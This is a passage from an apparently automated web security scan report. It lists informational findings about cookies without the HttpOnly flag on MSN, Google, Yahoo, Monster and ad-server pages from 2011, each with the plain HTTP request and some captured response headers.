MC1=V=3&GUID=4f2f19d5d3e64638a39ef8c9a0e56298; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=9A2C4E32A10C4DF3AE112D8B596AEC73; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.265. http://editorial.autos.msn.com/media/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/media/video/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0dd7202db890418c95a7232d432d9a03; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1CF9F665B11C4AE9AF3A7B83F378BDD3; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.266. http://editorial.autos.msn.com/new-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/new-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=775a706ba27249818384c9ddc6f0be26; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=452825B919744E0CBD3D811A7E5DDB62; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=775a706ba27249818384c9ddc6f0be26; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=452825B919744E0CBD3D811A7E5DDB62; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

12.267. http://editorial.autos.msn.com/used-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/used-cars/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a42dce0f38a347f48d33b0d543fa5631; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=718D92C75E2A4AC1AED19F22E9A0BF40; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.268. http://entertainment.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=b39c3a5d929f4c56b9f0ed54cc0437f4; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.269. http://entertainment.msn.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=5ee08328c5854a91b8ceda54850cba49; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.270. http://entertainment.msn.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=ab9a494b3ce24782ad4af7e40153d000; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.271. http://google.com/safebrowsing/diagnostic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://google.com
Path:	/safebrowsing/diagnostic

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=5f73d22166d7f160:TM=1296674447:LM=1296674447:S=4xGMQcbY0V59KZNy; expires=Fri, 01-Feb-2013 19:20:47 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /safebrowsing/diagnostic HTTP/1.1
Host: google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5f73d22166d7f160:TM=1296674447:LM=1296674447:S=4xGMQcbY0V59KZNy; expires=Fri, 01-Feb-2013 19:20:47 GMT; path=/; domain=.google.com
Date: Wed, 02 Feb 2011 19:20:47 GMT
Server: safebrowsing_diagnostic
Content-Length: 1377
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

12.272. http://gorp.away.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gorp.away.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: gorp.away.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 19:20:51 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Location: http://www.gorp.com
Content-Length: 227
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.gorp.com">he
...[SNIP]...

12.273. http://goto.ext.google.com/og-dogfood-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goto.ext.google.com
Path:	/og-dogfood-issue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=apphosting=5bfqLIwMiNUb2voqmYWZZQ; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-dogfood-issue HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-dogfood-issue
Set-Cookie: S=apphosting=5bfqLIwMiNUb2voqmYWZZQ; path=/
Date: Tue, 01 Feb 2011 15:34:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close

12.274. http://goto.ext.google.com/og-exp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://goto.ext.google.com
Path:	/og-exp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=apphosting=9dBJEPaFkbGaFhd40xIrtw; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-exp HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-exp
Set-Cookie: S=apphosting=9dBJEPaFkbGaFhd40xIrtw; path=/
Date: Tue, 01 Feb 2011 15:34:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close

12.275. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=b5e0034c1c17149b:TM=1296574467:LM=1296574467:S=MCQiCWxvNtVoqgA-; expires=Thu, 31-Jan-2013 15:34:27 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.276. http://health.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=7308e0c789104f31abdeb2e68a6d57ff; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6F3EFCB2F9904D1D9B49CA53FAC866EF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.277. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/health-topics/quit-smoking/articlepage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a0a61b8a17324a34bcefa62237ce7c6d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6FC2D6913483462A84559AE5C41E3ABF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /health-topics/quit-smoking/articlepage.aspx HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.278. http://hit.clickaider.com/clickaider.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hit.clickaider.com
Path:	/clickaider.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Thu, 02 Feb 2012 20:08:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.279. http://hit.clickaider.com/pv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hit.clickaider.com
Path:	/pv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clickdata=eNptys0KwjAQBOB3WSjoQdNsbNJsEQ%2Fig6TNFgv2hySiIr67rQe9eJv5ZhxJekaSOYFttZG5LjcFVI6KhQ1B5OiZJ6g6klUkJEjxU9BqbQxaNasi6P5z4BbmJC3BOaWJhKivYRLxPN7ETi1TQcBDCo%2FPLc9%2Fv9EFH9h5Dttm7IUfe9cNAns%2FbAdO4o544JpbkyFm6pSpY2xCN6U5uwuHtJLr2cQXdauttiU67fcSqtfrDS1OScw%3D; path=/; domain=.clickaider.com
sid=d269a5c2-241228395777; path=/; domain=.clickaider.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.280. http://i.simpli.fi/dpx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.simpli.fi
Path:	/dpx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=riSVQ01JdHij7HwVqTSiAg==; expires=Thu, 02-Feb-12 15:12:56 GMT; domain=simpli.fi; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.281. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_148=1699-uid:$UID; domain=pubmatic.com; expires=Fri, 01-Feb-2013 15:32:10 GMT; path=/
PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.282. http://images.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/images

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=8d7907b0c7f09bac:FF=0:TM=1296574493:LM=1296574493:S=lfLFI68r6wBg7FaU; expires=Thu, 31-Jan-2013 15:34:53 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.283. http://info.yahoo.com/w3c/p3p.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://info.yahoo.com
Path:	/w3c/p3p.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

B=5tvhlp96kga0t&b=3&s=7g; expires=Tue, 01-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w3c/p3p.xml HTTP/1.1
Host: info.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.284. http://jdn.monster.com/render/adserverclick.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jdn.monster.com
Path:	/render/adserverclick.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DELIGIBLE=JobID=96183799&Job.2=96183799&Loc.2=371&Cat.2=660&Car.2=12&Edu.2=2&ver=1,2; expires=Thu, 31-Jan-2013 15:35:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /render/adserverclick.aspx?AdID=1265340&ImpressionGuid=9f490517-dffb-17bd-848b-f620c04503d9&AffiliateGuid=64f58eca-dbc0-4a8f-b5f6-e4221149d1b8&CampaignID=3241&Premium=1&RendererID=566&code=-1&unit=-1 HTTP/1.1
Host: jdn.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 446
Content-Type: text/html; charset=utf-8
Location: http://jobview.monster.com/getjob.aspx?JobID=96183799&JDNJobDocument.JobID=46130753&AdID=1265340&ImpressionGuid=9f490517-dffb-17bd-848b-f620c04503d9&AffiliateGuid=64f58eca-dbc0-4a8f-b5f6-e4221149d1b8&CampaignID=3241&Premium=1&RendererID=566&code=-1&unit=-1&stracking=&WT.mc_n=JDN000003
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA",policyref="http://media.monster.com/w3c/p3p.xml"
Expires: Tue, 01 Feb 2011 15:35:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:35:11 GMT
Connection: close
Set-Cookie: DELIGIBLE=JobID=96183799&Job.2=96183799&Loc.2=371&Cat.2=660&Car.2=12&Edu.2=2&ver=1,2; expires=Thu, 31-Jan-2013 15:35:11 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://jobview.monster.com/getjob.aspx?JobID=96183799&JDNJobDocument.JobID=46130753&AdID=1265340&Impressi
...[SNIP]...

12.285. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvoT8h7Ts3xm/ap8Mkb9Q+GVTuR5n80ave3qy14HbyO8+Tcni3oWJVsXNJZ2BoNcclQkVAkXBr3QjDZUGqY/VB76lycBkbXZ/PmM5ZvqG73GQvL4NN3zYvKIXx9zvKHgRcUGOKdYPdUASY9ojdIV8gYJGQFNpzGY2z0gWMDX4TxCEac8R3Ke9ppb194xfECkX2pU1O1iHFy42uElW4j5+v/f8eKkFQ5MzvYE/jyv/rdQiQ09Ai+GU/SjsOZnNQhSBqoMRy93up9vn3PUZA45DM7V+v2Zgn8PXHeSPS85ij7VFR9oQiUVQO38lZzBhUE4hFvl3EkuGg0bi17IV4EBRVWiGu2RmG1QDm5JKJTNslOkv1LdL89z3GMvpJmvs+T5vdyHmAWeZtfRM9cFdfQGSZJjmNUVtgqHDCEiPN0vrW3gnfNbz8nrxNp/cOhwEmsOuhPOMUp+bhkRfmz9kYr5Jnari/GTw58CYqV8h4rzD7qgsc6K4ko5+gPLeQCL5fF69RvQ7fHNZCY0Wgm6mdclFvksFmiNCBpS9srXF7bYyO3+oeVB4D8j5B9nxiUjybPaivGWNDOgiQD79UoUb73FJ7Wm2q4yQrEhX1SpimuhPzRYA0qz7LRvSc3Zoyp+uKsqctxrNIF98i4/5zjBOYg6j/oTeItuQpdMgnyCRARTjQVRzDG96I9Zo6QAEqZ+Y0Iv7BJZL6jkVTjliHFn3FYRW3KH63Oo2bPpUYPX3DgLj6a3b3noH5DkkVQsOSyax16pb5DFwSyDDHu/ugupu5TH8NhEFXauRtWMQprWMn/RWgZFUzttuV9+nL1UnJeHsmWcaceq2g5cjxG1QCGzBbIio/mVhYuhpLzriZs7gmMWx57OH6EAkOz81CWKdorEUgfK0LHu/h+pCNMEHMQhgIlyLysXM8hjqWOr2q1JiFiQmE8C5vXaiir/3o/JYyvxUU0zqT2uM0qnKPCWoCbsd3re35olXtVu8xecblsDX5g66gqZsTE6PDW8nGDZGkIdAGFJ7PZeycd5UmrQSEfWKf4cgvbrqXv0XExi2hrQTYXR0Ql4YjukjJ8J5wlmXH0J4hY3uL+VfDSeK4BvrrNJu19JkjkefmVpbC4yYpcu0I0IY4u43Hkcwa1LL+N8+mYbQTmfoGF5IQ+frCKYD5ncwZ04oRqB8G8Y3clOManGAsTIJJC1Hgb3tiZMPDnWHX1HKz; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.286. http://khm0.google.com/kh/v/x3d78/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm0.google.com
Path:	/kh/v/x3d78/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=597da63009975a31:TM=1296660737:LM=1296660737:S=dj3MDnS0o7lzEybf; expires=Fri, 01-Feb-2013 15:32:17 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d78/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.287. http://khm1.google.com/kh/v/x3d78/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm1.google.com
Path:	/kh/v/x3d78/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=6150361c4ff61aec:TM=1296660738:LM=1296660738:S=KMYUbLyfTtUioz77; expires=Fri, 01-Feb-2013 15:32:18 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d78/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.288. http://khmdb0.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb0.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=f9ac3558c946f1bf:TM=1296574515:LM=1296574515:S=GYTuoTJIwZnulK74; expires=Thu, 31-Jan-2013 15:35:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.289. http://khmdb1.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb1.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=0f7b297aa78cda55:TM=1296574516:LM=1296574516:S=u4YfcXlDueAKsrh4; expires=Thu, 31-Jan-2013 15:35:16 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.290. http://kona32.kontera.com/KonaGet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kona32.kontera.com
Path:	/KonaGet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

KONA_USER_GUID=123B26B2-2E10-11E0-80DD-00163E201266; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.kontera.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KonaGet.js HTTP/1.1
Host: kona32.kontera.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.291. http://latino.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=9d545b8e7c294f73be8077c433db73e1; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
hpsvr=D:blu|W:F|P:W; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
hpcli=0|W.1.1; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
hpwea=wc:USNY0996; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
FlightId=BasePage; domain=latino.msn.com; expires=Fri, 01-Feb-2013 15:32:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: latino.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.292. http://lifestyle.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=2a12c3db76554c88bcc15f3d1972d7d1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=446F7968FE604E76BC57FDFC6FE2F8F8; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.293. http://lifestyle.msn.com/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=19b8b919321c4b70a4c56228d47fe5d7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D7D346F140D24800A7F7C7D8AE9E7587; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.294. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=f9e342628c86424dbe17a9b36721ff3e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=510B51B44D8441759249F9B01D1FC431; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.295. http://lifestyle.msn.com/relationships/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=aed3eab0d2944a70a4acb0f61a52979f; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A244C42C3EB543068F140045C0B53D89; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.296. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-home/cleaning-organizing/staticslideshowrs.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

